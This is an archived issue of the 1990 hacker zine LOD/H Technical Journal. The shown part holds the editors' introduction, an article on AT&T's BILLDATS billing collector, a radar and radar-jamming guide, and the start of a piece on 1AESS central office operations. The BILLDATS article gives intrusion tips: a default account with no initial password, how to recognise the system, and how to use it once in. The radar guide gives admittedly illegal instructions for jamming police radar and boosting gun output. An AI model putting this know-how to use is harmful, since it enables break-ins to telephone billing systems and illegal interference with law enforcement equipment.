💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › LOD › lod-4 captured on 2022-06-12 at 13:05:48.
View Raw
More Information
-=-=-=-=-=-=-
The LOD/H Technical Journal, Issue #4: File 01 of 10
Finally Released: May 20, 1990
THE
LOD/H TECHNICAL JOURNAL
INTRODUCTION
-------------
We are still alive. This publication is not released on any schedule. Past
attempts at scheduling issues have failed miserably. The editors refuse to
release issues which are not up to our self-defined standards. We have in the
past, and will continue in the future, to accept articles from anyone (e.g.
non LOD) as long as the articles adhere to our basic format and style. The
editors review all articles to verify accuracy and integrity however it may
not be possible in all cases to check every fact. Plagiarized material is not
acceptable and we make every attempt to verify an article's originality. When
referenced material is used, the source for that material must be clearly
stated. The more articles we receive the sooner each issue is released. There
is a minimum 2 month review and editing period for each article. If you want
to contribute articles contact any member and they will forward articles to
the editors.
There seems to be some confusion as to what writers are (or were) in LOD/H and
what ones aren't. JUST BECAUSE SOMEONE WRITES FOR THIS PUBLICATION DOES NOT
MEAN THEY ARE AN LOD/H MEMBER! Just to clear up any confusion, a current
member list follows:
Lord Havok
Lex Luthor
Prime Suspect
Phase Jitter
Professor Falken
Skinny Puppy
File 06: The History of LOD/H is a short article explaining the origin of the
group. We realize this is of interest to only a few, and most people probably
could care less. However, also included is a list of EVERY member who was ever
in the group. This is to clear up any and all misconceptions about members.
The press, telecommunications and computer security people, law enforcement,
and others can finally get their facts straight [See Issue #3, article 10,
Clearing up the mythical LOD/H Busts for a prime example, and also in the
Network News and Notes section -- first two articles regarding more so called
'LOD BUSTS']. Another purpose is to thwart would-be group impostors. SYSOPS
who give system access to individuals solely because they are a member of some
respected group are urged to verify the hacker's identity as best they can. No
one should be taken on their word alone.
This issue is dedicated to the three (now "retired") members who recently
received visits from our friends and yours, the U.S. Secret Service and
Bell South Security: The Leftist, The Urvile, and The Prophet. Again, see
the Network News and Notes section for the stories.
Although the TJ is distributed to many boards, the inability for any decent
board to consistently remain online prevents us from utilizing "sponsor"
boards as distribution hubs. Therefore, the TJ will be distributed to whatever
boards are around at the time of release. Due to the lack of boards the
newsletter will be distributed in diskette form to those who can help in its
distribution.
___________________________________________________________________________
TABLE OF CONTENTS
Name of article or file Author Size
-----------------------------------------------------------------------------
01 Introduction to the LOD/H Technical Journal Staff 04K
and Table Of Contents for Issue #4
02 The AT&T BILLDATS Collector System Rogue Fed 14K
03 The RADAR Guidebook Professor Falken 17K
04 Central Office Operations Agent Steal 32K
05 A Hackers Guide to UUCP The Mentor 27K
06 The History Of LOD/H Lex Luthor 12K
07 The Trasher's Handbook to BMOSS Spherical Abberation 11K
08 The LOD/H Telenet Directory Update #4 Part A Lord Havok 65K
09 The LOD/H Telenet Directory Update #4 Part B Lord Havok 43K
10 Network News and Notes Staff 38K
Total: 7 Articles 10 Files 263K
____________________________________________________________________________
End Of Intro/TOC
Issue #4
The LOD/H Technical Journal, Issue #4: File 02 of 10
The AT&T BILLDATS Collector
Written by:
Rogue Fed
==============================================================================
NOTES: This article will hopefully give you a better understanding of how
the billing process occurs. BILLDATS is just one part of the billing picture.
Before I began working for the government, I was a Telco employee and thus,
the information within this article has been learned through experience.
Unfortunately, I was only employed for a few months (including training on
BILLDATS) and am still learning more about the many systems that a telco uses.
There are however, a couple of lists that were compiled and slightly modified
from what little reference material I could smuggle out and my notes from the
training class. This article does require a cursory knowledge of telco and
computer operations (ie. switching, SCCS, UNIX).
INTRODUCTION -
==============
BILLDATS - BILLing DATa System
BILLDATS can be explained in a nutshell by the acronym listed above. If it's
one thing telecommunications providers do well, it's creating acronyms.
Basically, BILLDATS collects billing information (that's why they call it a
Collector) from AMATs (Automatic Message Accounting Transmitters). The AMATs
are situated in or close to switching offices and are connected to BILLDATS
either through dedicated or dial-up lines. BILLDATS can be considered as
the "middleman" in the billing process. The system collects, validates, and
adds identification information regarding origination and destination. This
is then transferred to tape (or transmitted directly) to the RPC (Regional
Processing Center) or the RAO (Revenue Accounting Office). The RPC/RAO
actually processes the billing information. Typically the BILLDATS system is
located in the same or adjoining building (but can be across town) to
the RPC/RAO.
BILLDATS is similar to many other phone company systems (ie. SCCS) as it uses
a combination of software. The software base is UNIX and the BILLDATS Generic
program runs on it. The hardware used is an AT&T 3B20 (this is what 5ESS
switches use).
Some of the more interesting features BILLDATS possesses are:
- Can be accessed via dialup (always a plus).
- Runs under UNIX (another plus).
- Interface with SCCS (yet another plus).
- Can store about 12 million calls for the first two disks and about
8 million calls for each additional disk. A total of 6 (675 MB) disks
can be used.
- Inserts the sensor type and ID and recording office type and ID onto
every AMA record that it collects.
- Capable of collecting information from nearly 600 AMATs.
To better understand how/why you get a bill after making long distance phone
calls, I have delineated the steps involved.
You call Hacker X and tell him all about the latest busts that have occurred,
he exclaims "Oh Shit!" hangs up on you and throws all his hacking information
into the fireplace. The actual call is referred to as a call event. As each
event happens (upon termination of the call) the event is recorded by the
switch. This information is then sent via an AMA Transmitter which formats the
information and then sends it to BILLDATS (commonly called a "Host
Collector"). BILLDATS then provides the information to the RAO/RPC. The
billing computer is located at the RAO/RPC. Do not confuse the actual billing
system with BILLDATS! The billing computer:
- Contains customer records
- Credit ratings (in some telcos)
- Totals and prints the bill
- Generates messages when customers do not pay (ie. last chance and
temporary termination of service)
When the billing period is over, (typically 25-30 days), many events (it
depends on how many calls you have made) have accumulated. A bill is then
generated and mailed to you.
COLLECTION -
============
BILLDATS collects information in two ways:
1. AMATs
2. Users
AMAT input
----------
BILLDATS collects data from the AMAT either directly from the switch, or from
a front end which performs some processing on the data before giving it to
BILLDATS. The data I am talking about here is usually AMA billing information.
The information is in the usual AMA format (see Phantom Phreaker's article in
the LOD/H Technical Journal, Issue #3 on AMA for formats and other info). As
I said earlier, the recording office and sensor types and IDs have to be
added by BILLDATS. The other information that is transmitted is usually
maintenance data.
The data that is transferred between BILLDATS and an AMAT is accomplished
over either dedicated or dialup lines using the BX.25 protocol. This protocol
has been adopted by the telecommunications industry as a whole. It is
basically a modified version of X.25.
User input
----------
This is simply sysadmin and sysop information.
INSERTED INFORMATION -
======================
Once the information is collected, additional data (mentioned earlier)
must be inserted. The information that BILLDATS inserts into the AMA records
it receives depends on whether the AMAT is a single or multi-switch AMAT.
Either way, the data is passed through the DEP. The DEP is a module which
is part of the LHS (Link Handler Subsystem) that actually inserts the
additional data. It also performs other functions which are rather
uninteresting to the hacker. The LHS manages the x-mission of all the
collected information. This is either through dedicated or dialup lines. The
LHS is responsible for:
- Logging of statistics as related to the performance of links.
- Polling of remote switches for maintenance and billing information.
- Passing information to the DEP in which additional information is
inserted.
- Storing billing information.
- Other boring stuff.
AMATS -
=======
Basically an AMAT is a front end to the switch. The AMAT:
- Gets AMA information from the switch.
- Formats and processes the information.
- Transmits it to BILLDATS.
- An AMAT can also store information for up to 1 week.
The following is a list of switches and their related AMAT equipment that
BILLDATS obtains billing information from:
1A ESS: This is usually connected to a 3B APS (Attached Processor System) or
BILLDATS AMAT.
2ESS: This is connected to an IBM Series 1 AMAT.
2BESS: Connected to a BILLDATS AMAT.
4ESS: Connects to 3B APS.
5ESS: Direct connection.
TSPS 3B:Direct connection.
DMS-10: Connects to IBM Series 1 AMAT.
There are other AMATs/Switches but they must be compatible with the BILLDATS
interface.
ACCESSING BILLDATS -
====================
Even though a system is UNIX based, that doesn't mean that it is a piece of
cake to get into. Surprisingly (when you think about the average Intelligence
Quotient of telco personnel) but not surprisingly (when you consider that the
information contained on the system is BILLING information--the life blood of
the phone company) BILLDATS is a little more secure than your average telco
system, except for the fact the all login IDs are 5 lower case characters or
less. BILLDATS can usually be identified by:
bcxxxx 3bunix SV_R2+
where:
bc = B(ILLDATS) C(ollector).
xxxx = The node suffix. This is entered when the current Generic is installed.
3bunix = This simply indicates that UNIX is running on an AT&T 3Bxx system.
SV_R2+ = Software Version.
The good news is that there is a default username when the system is
installed. The bad news is that upon logon, the system forces you to choose a
password. The default username is not passworded initially. The added security
feature is simply that the system forces all usernames to have passwords. If
it doesn't have an associated password, the system will give you the message:
"Your password has expired. Choose a new one"
A 6-8 character password must then be entered. After this you will be asked
to enter the terminal type. The ones provided are AT&T terminals (615, 4425,
and 5420 models). Once entered a welcome message will probably be displayed:
"Welcome to the South Western Bell BILLDATS Collector"
"Generic 3, Issue 1"
"Tuesday 01 Aug 1989 12:44:44 PM"
dallas>
The BILLDATS prompt was displayed "dallas>" where dallas is the node name.
There are 3 privilege levels within BILLDATS:
1. Administrator
2. Operator
3. UUCP
- Administrator privs are basically root privs.
- An account with Operator privs can still do about anything an Admin can do
except make data base changes.
- UUCP privs are the lowest and allow file transfer.
Commands
--------
Just like SCCS, UNIX commands can be entered while using BILLDATS. The format
is:
dallas>run-unx:$unix cmd�;
All unix commands must be preceded by "run-unx:" and end with a semicolon ";".
The semicolon is the command terminator character (just like Carriage Return).
BILLDATS isn't exactly user friendly, but it does have on-line help. There are
a number of ways that it can be obtained:
dallas> help-?; or help-??; or ?-help; or ??-help;
If you want specific help:
dallas> help-(command name);
I can list commands forever, but between UNIX (commands every hacker should
be familiar with) and help (any moron can use it), you can figure out which
ones are important.
Error Messages
--------------
Just like SCCS, BILLDATS has some rather cryptic error messages. There are
thousands of error messages, once you know a little about the format they
are easier to understand. When a mistake is made, something similar to
the following will appear:
UI0029 (attempted command) is not a valid input string.
^ ^- error message information
|
|-- This is the subsystem and error message number
The following is a brief description of subsystem abbreviations:
BD: BILLDATS system utilities. Errors associated with the use of utility
programs will be displayed.
DB: Data Base manager. These messages are generated when accessing or
attempting to access the various Data Bases (explained later) within
BILLDATS.
DM: Disk Manager. Basically, information pertaining to the system disk(s).
EA: Error and Alarm. As the name implies, system errors and alarms.
LH: Link Handler. Messages related to data link activity, either between
BILLDATS and the AMAT or BILLDATS and the RAO/RPC.
SC: Scheduler. The scheduler is BILLDATS' version of the UNIX cron daemon.
BILLDATS uses cron to schedule things like when to access remote systems.
TW: Tape Writer. Messages related to storing billing information on tapes
which will then be transported to the RAO/RPC.
UI: User Interface. This was used in the above example. Displays syntax,
range or status errors when entering commands.
DL: Direct Link. Instead of BILLDATS information being written to tape, a
direct link to the RPC/RAO mainframe (the actual billing system computer)
can be accomplished. This is usually done when BILLDATS is located far
away from the RPC/RAO office as there is always some risk involved in
transporting tapes, and that risk increases the farther away the two
offices are. Another neat thing about Direct Link is that the billing data
can be sent across a LAN (Local Area Network) also. Obviously this incurs
some concerns regarding security, but from what I have heard and seen,
AT&T and the BOC's typically choose to ignore the security of their
systems which suits me just fine. The Direct Link is an optional BILLDATS
feature and if it is in use, messages related to its operation are
displayed with the DL prefix.
BILLDATS DATA BASES -
=====================
The databases contain all kinds of useful information such as usernames,
switch types, scheduled polling times, etc.
The AMAT Data Base contains:
- Type of switch
- Sensor type and identification
- AMAT phone number
- Channel and port number/group
- Other boring information
The Port Data Base contains:
- Communications information (like L-Dialers on UNIX Sys. V)
- Channel and port information
- Other boring information
The Collector Data Base contains:
- Collector office ID
- Version number of the Data Base
- Number and speed of any remote terminals
- When reports are scheduled for output
- Other boring information
CONCLUSION -
============
If you are not technically oriented, I hope this article helped you understand
how you get your bill. I assumed that you would skip over the commands for
using BILLDATS and similar information.
If you are technically oriented, I hope I not only helped you understand more
about the billing process, but also increased your awareness of how detailed
the whole process is. And if you do happen to stumble onto a BILLDATS system,
you have been pointed in the right direction as far as using it correctly is
concerned.
I tried to leave out all the boring details, but some may have slipped by me.
I reserved the right to omit specific details and instructions regarding any
alteration or deletion of calls/charges for my own use/abuse.
The Rogue Federal Agent
[ End Of Article ]
The LOD/H Technical Journal, Issue #4: File 03 of 10
The Radar Guidebook
by
Professor Falken
-----------------------------------------------------------------------------
Anyone who has driven a car without a radar detector before, has gotten
that paranoid feeling that the cops are around radaring. This feeling is not
a nice one; it is the feeling that somewhere somehow someone is watching you.
In this article I will attempt to explain how radar guns work, what bands
the guns work on, why they are wrong 70% of the time, how to employ stealth
technology in defeating the radar, and last but not least jamming the radar.
RADAR stands for RAdio Detecting And Ranging. A speed-radar gun works
under the Doppler theory. This theory is that when a signal is reflected off
an object moving toward you, the signal will be at a higher frequency than the
initial frequency, this increase in frequency is used to calculate speed.
Many of you have experienced the Doppler effect, which occurs when a noise
from a siren increases in strength (gets louder) as it approaches and
decreases in strength (gets softer) as it moves away from you.
Right now in the United States, there are three bands that are Federal
Communication Commission (FCC) certified for "field disturbance sensors",
known to you and me as radar guns. These bands have proper non-technical
names, and all operate in the GigaHertz range. GigaHertz is a measure of
frequency; one GHz equals one billion cycles per second. Most frequency
modulation (FM) radio broadcasts are made in the 0.088 GHz to 0.108 GHz band,
in MegaHertz that is 88 MHz to 108 MHz. The three proper names for these
radar bands are: X, K, and Ka.
One of the older radar bands is the X band. X band radar is the most
commonly used radar band in the United States. X band radar transmits its
signal at 10.5250 GHz. The wattage of the radar's signal really depends upon
the gun manufacturer. However, most manufacturers agree that a 100 milliwatt
signal is "High-Power" and the 40 milliwatt range is "Low Power". The gun's
range also depends upon the manufacturer. The average maximum range of a X
band gun is 2500 feet. That estimate is based on the assumption that the gun
is operating at full-strength (100mw). Most radar detectors give off a
false signals on this band due to ultrasonic motion detectors employed
by various burglar alarm systems. Large grocery stores also use these to
open the doors magically as you walk in or out.
Another older band is K band. K band operates on 24.150 GHz and is not as
popular as X band, but it is gaining in usage throughout the country. The
normal signal strength of K band guns again depends upon the manufacturer,
but the ones I've seen all operate at 100 milliwatts at high-power. These
guns have a maximum range of 3000 feet, assuming they are at 100mw signal
strength.
A new type of radar has been introduced and assigned a frequency by the
Federal Communications Commission. This new band has been assigned the name
Ka and has been designated a frequency of 34.360 GHz. Current Ka technology
gives the gun a maximum effective range of 40 to 200 feet. This band
was originally made for use with photo-radar. The photo-radar can be set up
on a tripod on the side of the road or in the back of a police car. The
user then triggers a button when he wants a car in the guns range
clocked, automatically taking a picture of the car & license plate.
At the time the photograph is taken a date and time is imprinted on the
picture. The police keep one duplicate for archival purposes and sends the
other to the registered owner of the car along with ticket information and the
amount due. This type of system can only work in places that hold the owner
of a vehicle responsible for any violations that occur with the car. The
legal barriers for photo radar to overcome are extensive, most notably, not
giving the vehicle owner due process and the presumption of guilt. There is
a system out now for $19.95 that defeats Ka band photo radar. I expect it to
be illegal VERY QUICKLY once Ka is more widely used. This little baby slips
over your license plate and acts as venetian blinds. When looking straight at
the plate it looks like a normal plate with a black frame. However when
looking at it from a Ka band Photo Radar's angle it looks like a license plate
with a silver streak covering the whole plate, making it impossible to
identify. This device is called the Photobuster and is available from
most radar detector specialty stores.
There are two different types of radar guns. They are Instant-On/Pulse and
Constant Broadcasting Radar. The names are self-explanatory, but I will
explain them anyway. The constant broadcast radar continually transmits
its radar signal, and anything in its path will be clocked. Instant-On &
Pulse radars are basically identical, and are both very deadly since they are
harder to detect as a threat. The Instant-On gun is really nothing more than
an ON/OFF switch for signal transmission. In order to have a pulse gun, all
a cop has to do is purchase one with a "HOLD" feature or just turn the gun
on when he/she wishes to use it. The "HOLD" feature is simply a button that
keeps the gun on but makes sure no signal is being transmitted. No one can
detect a gun that is off or in "HOLD" mode. An officer using an Instant-On
radar gun will periodically check the speed of the traffic. These samplings
can easily be detected and will give the user of a detector prior warning to
a Instant On/Pulse activated radar gun.
Many detectors on the market today provide anti-falsing circuitry. Falsing
is the triggering of the radar detector from something other than a radar gun.
One or two detector manufactures make their detectors with GaAs diodes.
GaAs diodes are Gallium Arsenide diodes which are a military grade electrical
component that helps produce a good signal-to-noise ratio.
All new model radar detectors use Superheterodyne technology.
Superheterodyne, also known as active technology, amplifies all incoming
signals hundreds of times, which makes it more sensitive and selective as to
which signals will trigger an alert. Superheterodyne technology also gives
out a minute internal radar signal of its own, which can be picked up by older
(Pre/Early 1980's) non-anti-falsing radar detectors. If you have a newer
model radar detector, this small internally generated signal is no problem to
your's or anyone's anti-falsing radar detecting unit. NOTE: In states
where radar detectors are illegal (Ex. Virginia, Canada) the police have
devices which detect this Superheterodyne signal. Police can then stop
you and confiscate your detector. Getting around this police tactic
would be to use an early radar detector without Heterodyne/Superheterodyne
detection technology.
Many compact/shirt pocket radar units are "exclusively made with SMD's".
These SMD's are Surface Mounted Devices and contain extremely small resistors,
transistors, diodes, and capacitors. Just because a manufacturer uses SMD's,
that does NOT make the unit any better than a larger detector of the same age.
Cincinnati Microwave Inc., the makers of Escort and Passport say they have
the exclusive technology for the detection and anti-falsing of RASHID VRSS
technology. RASHID VRSS is actually the Rashid Radar Safety Brake Collision
Warning System. It is an electronic device that operates on K band
frequencies and warns heavy trucks and ambulances of hazards in their path.
About 900 RASHID VRSS units have been prototyped in three states. Since the
number of actual operating RASHID units is so minute, I really doubt you will
run into one.
There are two ways a radar gun can produce an incorrect speed reading.
These are known as the Cosine Error and Moving Radar Error. The Cosine Error
occurs when a radar gun gives a lower reading than the actual speed of the
target. This occurs because the gun can only measure the doppler shift that
occurs directly towards or away from the antenna. If the object moves at an
angle to the gun, the shift will be lower than if it moves directly at the
antenna. Therefore the reading the radar gun gives will be less than the
actual speed of the object. The radar reading can be calculated by taking
the Actual Speed times the cosine of the incidence angle. So if the target
car's actual speed is 50 miles per hour and it is 37 degrees off of the
mainline radar signal, the radar speed will be 40 miles per hour. Look:
Cosine Error Theory:
Actual Speed x Cosine of Incidence Angle = Radar's Shown Speed
Cosine of 37 degrees is 0.80
50 MPH x 0.80 = 40 MPH
So if you see a radar enabled cop coming head-on towards you it would be a
good idea to get into the right hand lane, or further if possible, as this
increases the angle and thus lowers your radar speed. The other error is the
Moving Radar Error, which occurs only when a police car is using a moving
radar gun. A false reading is obtained by the unit because before it
can radar you it must radar something along side the road to get the patrol
car's speed. Most often, billboards and parked cars are used for this initial
patrol car speed calibration. It is susceptible to errors because of the
Cosine Error, mentioned above. Once the patrol car has its speed (wrong or
not), it assumes that the target's (YOU) speed is the difference between the
highest oncoming signal and the patrol speed; but if the patrol speed is lower
it will ADD that error on to the target speed. So the target speed (YOU) will
read higher than you were actually traveling. Here's the theory and a
problem:
Moving Radar Theory:
Closing Speed - Patrol Speed = Target Speed
The ACTUAL speeds for these are:
Patrol Car Speed - 60 MPH
Target Car Speed - 60 MPH
Closing Speed - 120 MPH
Due to the Cosine Error the TARGET CAR's speed will cause the gun to
calculate a LOW reading for the actual patrol car's speed due to the cosine
error.
The RADAR calculated speeds are:
Patrol Car Speed - 50 MPH
Target Car Speed - 70 MPH
Closing Speed - 120 MPH
Thus you can see how the police car is going to get an incorrect reading.
This is a good one to memorize and bring into court for any tickets.
It's been recently brought to my attention that there are stealth-bras for
cars. From what I understand, the bras actually absorb the radar, and reflect
such a weakened signal that the radar gun cannot detect it. I have not seen
one of these in person, but from what I have heard they are made out of a VERY
DENSE rubber/metal composite. The bra probably traps the signal very much
like the F-117/B-2 stealth aircraft do. The material is probably made up of
hexagonal shaped cells, the back of the cell being at a slight angle, so that
any signal coming into the cell will have to bounce around within the cell
before exiting it. The inside of each cell is filled with a radar absorbing
material. As the signal hits the back of the hexagonal cell it is bounced
around inside the cell through the absorbing material, weakening the signal
each time it does so. Upon leaving the cell, the signal is so weak the
radar's receiver may not pick up the signal until the target is near enough
to give a positive return on the radar screen. When the aircraft is getting
closer, within radar range, the signal reflected may be so small the radar's
controller may think he is picking up ground interference, a flock of birds
or possibly bad weather. The actual radar absorbing material is classified at
this time by the government. The actual composite on the car bra is certainly
not as good as the actual radar absorption material of the aircraft, but I'm
sure it is somewhat similar.
Radar jamming is done very much the way any other type of radio jamming is
done. You simply overpower the frequency being used with a frequency of your
own. Radar jamming/overpowering is ILLEGAL in the United States. To jam a
signal all you need is a transmitter, an amplifier and an antenna. To jam a
gun using a K band radar (24.150 GHz) all you do is get a transmitter that can
transmit in the 20 GHz range and a 10-100 watt amplifier and antenna. Send
out a signal at around 24.05 GHz. This signal will make the cop's radar
either show a 0 or an incredibly slow speed such as -520. Usually the
cop's radar cannot show a negative sign, so it will just be 520. This
10-100 watt signal that you are transmitting will overpower the signal
his/her radar sent out and is waiting to receive. His/her gun is only at
100 milliwatts, and you're transmitting at 10-100 watts; its like using a
12-gauge shotgun against a rodent.
Where can you get microwave transmission equipment? You can check local
electronic shops, satellite stores, Cable TV companies and local television
stations as to where they buy their microwave transmission gear. Or you can
buy a radar gun of your own, and leave it ON whenever your driving. This will
give the cop's gun a very strange reading, most likely zero. If it is
possible, once you have the gun bring it to a "corrupt" electronics shop and
have it modified for high powered transmission, preferably in the 10 to 100
watt range.
Some radar guns have resistors implemented just before the antenna, but
just after the amplifier for de-amplification of the transmitter's signal.
This means that most guns already have a good (1 watt or so) transmit
capacity, but it is suppressed to bring the actual transmit signal to the
100mw area. The owner of the gun only has to know which resistors to take
out, then he/she will have a functional high powered gun. If this small
wattage does not satisfy you, you may have to purchase a separate amplifier
for the gun, and have it wired directly into the radar's transmitter antenna.
This modification is expensive not to mention illegal, but then again what the
hell isn't these days. I have seen six different types of guns offered from
National Radar Exchange. The following are a few major radar gun
manufacturers that are sold out of most radar shops. They are:
KUSTOM SIGNAL:
Kustom Signal HR-12 K Band 100mw signal 2000-3000 foot maximum range $695.00
Kustom Signal HR-8 K Band 100mw signal 1800-3000 foot maximum range $495.00
CMI INC.:
Speedgun One X Band 100mw signal 1000-2500 foot maximum range $395.00
Speedgun Six X Band 100mw signal 1000-2500 foot maximum range $495.00
(Since these units are the same, the only differences are things like
last speed reading recall, 10 number memory, etc.)
MPH INC.:
MPH K-55 X Band 40mw signal 1200-2500 foot maximum range $495.00
(Can clock target in 1/2 second, which is exceptionally fast for radar guns)
The only differences between the models are their bands and their options,
such as a "HOLD" button, last speed recorded etc.
I have found these to be some of the top units in the radar detector world
currently and are listed as follows:
MOST SENSITIVE MOST FEATURES BEST LOOKING MOST RELIABLE SMALLEST
-------------- ------------- ------------ ------------- -------------
COBRA 4120 COBRA 4120 Whistler 3SE ESCORT Uniden RD-9XL
BEL 944 COBRA 3160 BELL 944 K40 Whistler 3SE
Snooper 6000 BELL 944 Uniden RD-9XL
BEST VALUE LOUDEST BEST FILTERED
------------ -------------- ------------------
Snooper 4000 COBRA 5110 Snooper 6000
Cobra 5110 COBRA 3120 Other Snoopers
Cobra 3168 Whistler Q2002
Maxon RD25
I did not get to see Cincinnati Microwave's new "SOLO", nor BEL's
"Vector 3", "Express", nor it's newer "Legend 3."
Just because a detector is the MOST sensitive doesn't mean it is the best
detector. Because of the sensitivity you could pick up more alarms. What
you want is a detector with excellent sensitivity, but good anti-falsing
circuitry.
I hope this article has given you some insight on how radars work and
how their tickets CAN be defeated. Keep safe and sane,
Professor Falken
Legion Of Doom
<EOF>
The LOD/H Technical Journal, Issue #4: File 04 of 10
$$$$$$$$$$$$$$$$$$$$$$$$$$
$ $
$ Central Office Operations $
$ Western Electric 1ESS,1AESS, $
$ The end office network environment $
$ $
$ Written by Agent Steal 1989 $
$ $
$$$$$$$$$$$$$$$$$$$$$$$$$$
Topics covered in this article will be:
Call tracing
RCMAC
Input/output messages
SCC and SCCS
COSMOS and LMOS
BLV, (REMOB) and "No test trunks"
Recent change messages
Equal Access
Did I get your attention? Good, everyone should read this. With the time,
effort, and balls it has taken me compile this knowledge it is certainly worth
your time. I hope you appreciate me taking the time to write this.
I should point out that the information in this article is correct to the
best of my knowledge. I'm sure there are going to be people that disagree
with me on some of it, particularly the references to tracing. However, I
have been involved in telecommunications and computers for 12+ years.
I'm basing this article around the 1AESS since it is the most common
switch in use today.
** OUTSIDE PLANT **
This is the wiring between your telephone and the central office. That is
another topic in itself. If you are interested read Phucked Agent 04's article
on The Outside Loop Distribution Plant (OLDP) in the LOD/H Technical Journal,
Issue #1. The article explains those green boxes you see on street corners,
aerial cables, manholes etc. So where that article stops, this one starts.
** CABLE VAULT **
All of the cables from other offices and from subscribers enter the
central office underground. They enter into a room called the cable vault.
This is a room generally in the basement located at one end or another of the
building. The width of the room varies but runs the entire length of the
building. Outside cables appear through holes in the wall. The cables then run
up through holes in the ceiling to the frame room.
Understand that each of these cables consist of an average of 3600 pairs
of wires. That's 3600 telephone lines. The amount of cables obviously depends
on the size of the office. All cables (e.g. interoffice, local lines, fiber
optic, coaxial) enter through the cable vault.
** FRAME ROOM **
The frame is where the cable separates into individual pairs and attach
to connectors. The frame runs the length of the building, from floor to
ceiling. There are two sides to the frame, the horizontal side and the
vertical side. The vertical side is where the outside wiring attaches and the
protector fuses reside. The horizontal side is where the connectors to the
switching system reside. Multi-conductor cables run from the connectors to
actual switching equipment. So what we have is a large frame called the Main
Distribution Frame (MDF) running the entire length of the building. From floor
to ceiling it is 5 feet thick. The MDF consists of two sides, the VDF and the
HDF. Cables from outside connect on one side and cables from the switching
equipment connect to the other side and jumper wires connect the two. This way
any piece of equipment can be connected to any incoming "cable pair". These
jumper wires are simply 2 conductor twisted pair, running between the VDF and
the HDF.
What does all this mean? Well if you had access to COSMOS you would see
information regarding cable and pair and "OE" (Office Equipment). With this
information you could find your line on the frame and on the switch. The VDF
side is clearly marked by cable and pair at the top of the frame, however the
HDF side is a little more complicated and varies in format from frame to frame
and from switch to switch. Since I am writing this article around the 1AESS,
I will describe the OE format used for that switch.
OE ABB-CDD-EFF
Where..
A = Control Group (when more than one switch exists in that C.O.)
B = LN Line Link Network
C = LS Line Switching Frame
D = CONC or CONCentrator
E = Switch (individual, not the big one)
F = Level
There is one more frame designation called LOC or LOCation. This gives the
location of the connector block on the HDF side. Very simply, looking at the
frame:
H ---------------------------------------------------------------------
G ---------------------------------------------------------------------
F ---------------------------------------------------------------------
E ---------------------------------------------------------------------
D ---------------------------------------------------------------------
C ---------------------------------------------------------------------
B ---------------------------------------------------------------------
A ---------------------------------------------------------------------
123456789 etc.
Please note that what you are looking at here represents the HDF side of
the MDF, being up to 100 feet long, and 20 feet high. Each "-" represents a
connector block containing connections for 4 x 24 (which is 96) pairs.
So far I've covered how the wires get from you to the switching
equipment. Now we get to the switching system itself.
** SWITCHING SYSTEMS **
Writing an article that covers them all would be lengthy indeed. So I am
only going to list the major ones and a brief description of each.
- Step by Step
Strowger 1889
First automatic, required no operators for local calls
No custom calling or touch tone
Manufactured by many different companies in different versions
Hard wire routing instructions, could not choose an alternate route if
programed route was busy
Each dial pulse tripped a "stepper" type relay to find its path
- No.1 Crossbar 1930
- No.5 Crossbar 1947 (faster, more capacity)
Western Electric
First ability to find idle trunks for call routing
No custom calling, or equal access
Utilized 10x20 cross point relay switches
Hard wired common control logic for program control
Also copied by other manufactures
- No.4 Crossbar
Used as a toll switch for AT&T's long lines network
4 wire tandem switching
Not usually used for local loop switching
- No.1ESS 1966
- No.1AESS 1973
Western Electric
Described in detail later
- No.1EAX
GTE Automatic Electric
GTE's version of the 1AESS
Slower and louder
- No.2ESS 1967
- No.2BESS 1974
Western Electric
Analog switching under digital control
Very similar to the No.1ESS and No.1AESS
Downsized for smaller applications
_ No.3ESS
Western Electric
Analog switching under digital control
Even smaller version of No.1AESS
Rural applications for up to 4500 lines
- No.2EAX
GTE Automatic Electric
Smaller version of 1EAX
Analog switch under digital control
- No.4ESS
Western Electric
Toll switch, 4 wire tandem
Digital switching
Uses the 1AESS processor
- No.3EAX
Gee is there a pattern here? No GTE
Digital Toll switch
4 wire tandem switching
- No.5ESS
AT&T Network Systems
Full scale computerized digital switching
ISDN compatibility
Utilizes time sharing technology
Toll or end office
- DMS 100 Digital Matrix Switch
Northern Telecom
Similar to 5ESS
Runs slower
Considerably less expensive
- DMS 200
Toll and Access Tandem
Optional operator services
- DMS 250
Toll switch designed for common carriers
- DMS 300
Toll switch for international gateways
- No.5EAX
GTE Automatic Electric
Same as above
How much does a switch cost? A fully equipped 5ESS for a 40,000
subscriber end office can cost well over 3 million dollars. Now you know why
your phone bill is so much. Well...maybe you parents bill.
** The 1ESS and 1AESS **
This was the first switch of it's type put into widespread use by Bell.
Primarily an analog switch under digital control, the switch is no longer
being manufactured. The 1ESS has been replaced by the 5ESS and other full
scale digital switches, however, it is still by far the most common switch
used in today's Class 5 end offices.
The #1 and 1A use a crosspoint matrix similar to the X-bar. The primary
switch used in the matrix is the ferreed (remreed in the 1A). It is a two
state magnetic alloy switch. It is basically a magnetic switch that does not
require voltage to stay in it's present position. A voltage is only required
to change the state of the switch.
The No. 1 utilized a computer style, common control and memory. Memory
used by the #1 changed with technology, but most have been upgraded to RAM.
Line scanners monitor the status of customer lines, crosspoint switches,
and all internal, outgoing, and incoming trunks, reporting their status to
the central control. The central control then either calls upon program or
call store memories to chose which crosspoints to activate for processing the
call. The crosspoint matrices are controlled via central pulse distributors
which in turn are controlled by the central control via data buses. All of
the scanner's AMA tape controllers, pulse distro, x-point matrix, etc., listen
to data buses for their address and command or report their information on
the buses. The buses are merely cables connecting the different units to the
central control.
The 1E was quickly replaced by the 1A due to advances in technology. So
1A's are more common, also many of the 1E's have been upgraded to a 1A.
This meant changing the ferreed to the remreed relay, adding additional
peripheral component controllers (to free up central controller load) and
implementation of the 1A processor. The 1A processor replaced older style
electronics with integrated circuits. Both switches operate similarly.
The primary differences were speed and capacity. The #1ESS could process
110,000 calls per hour and serve 128,000 lines.
Most of the major common control elements are either fully or partially
duplicated to ensure reliability. Systems run simultaneously and are checked
against each other for errors. When a problem occurs the system will double
check, reroute, or switch over to auxiliary to continue system operation.
Alarms are also reported to the maintenance console and are in turn printed
out on a printer near the control console.
Operation of the switch is done through the Master Control Center (MCC)
panel and/or a terminal. Remote operation is also done through input/output
channels. These channels have different functions and therefore receive
different types of output messages and have different abilities as for what
type of commands they are allowed to issue. Here is a list of the commonly
used TTY channels.
Maintenance - Primary channel for testing, enable, disable etc.
Recent Change - Changes in class of service, calling features etc.
Administrative - Traffic information and control
Supplementary - Traffic information supplied to automatic network control
SCC Maint. - Switching Control Center interface
Plant Serv.Cent.- Reports testing information to test facilities
